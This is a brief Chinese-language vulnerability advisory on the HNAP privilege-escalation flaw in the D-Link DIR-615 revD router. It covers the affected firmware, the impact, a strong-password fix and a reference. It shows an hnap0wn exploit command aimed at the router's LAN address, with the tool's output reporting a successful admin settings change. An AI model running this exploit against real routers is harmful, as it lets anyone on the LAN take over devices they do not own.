D-Link DIR-615 revD HNAP Vulnerability

漏洞概述

DIR-615 revD路由器在实现HNAP(家庭网络管理协议)时存在缺陷,导致经常被忽视的普通用户可以执行管理员操作,如修改管理员密码。

影响版本

DIR-615 revD UK V4.11

攻击方式

使用hnap0wn工具攻击

$ ./hnap0wn 192.168.0.1 xml/SetDeviceSettings.xml
Trying SOAPAction header exploit...
SOAPAction header exploit failed! Trying privilege escalation exploit...
<?xml version='1.0' encoding='utf-8'?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<SetDeviceSettingsResponse xmlns="http://purenetworks.com/HNAP1/">
<SetDeviceSettingsResult>REBOOT</SetDeviceSettingsResult>
</SetDeviceSettingsResponse>
</soap:Body>
</soap:Envelope>

漏洞影响

默认密码或弱口令用户,LAN内网所有人都可以控制路由器

漏洞修复

设置强密码

参考资料

http://www.devttys0.com/wp-content/uploads/2010/12/dir615_revD_uk_hnap.pdf

您可能还喜欢...